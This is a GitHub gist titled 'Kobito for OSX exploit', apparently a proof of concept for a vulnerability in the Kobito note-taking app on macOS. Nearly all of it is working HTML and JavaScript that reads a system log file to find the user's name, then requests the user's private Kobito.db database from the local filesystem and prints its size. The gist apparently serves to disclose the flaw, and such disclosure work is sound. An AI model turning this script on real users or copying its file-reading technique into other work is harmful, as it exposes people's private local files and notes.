Skip to content

Instantly share code, notes, and snippets.

@mala mala/0.md
Last active Dec 29, 2016

Embed
What would you like to do?
Kobito for OSX exploit
<div id="result"></div>
<script>
function log(t){
document.getElementById("result").innerText += t + "\n";
}
log(location);
var username;
var req = new XMLHttpRequest;
req.open("GET", "/private/var/db/mds/messages/se_SecurityMessages", true);
req.onload = function(){
username = req.responseText.match(/\/Users\/(.*?)\/Library\//)[1]
log("Username:" + username);
var path = "/Users/" + username + "/Library/Containers/com.qiita.Kobito/Data/Library/Kobito/Kobito.db";
req.open("GET", path, true);
req.onload = function(){ log("Kobito.db: " + req.responseText.length + " bytes")};
req.send();
};
req.send();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.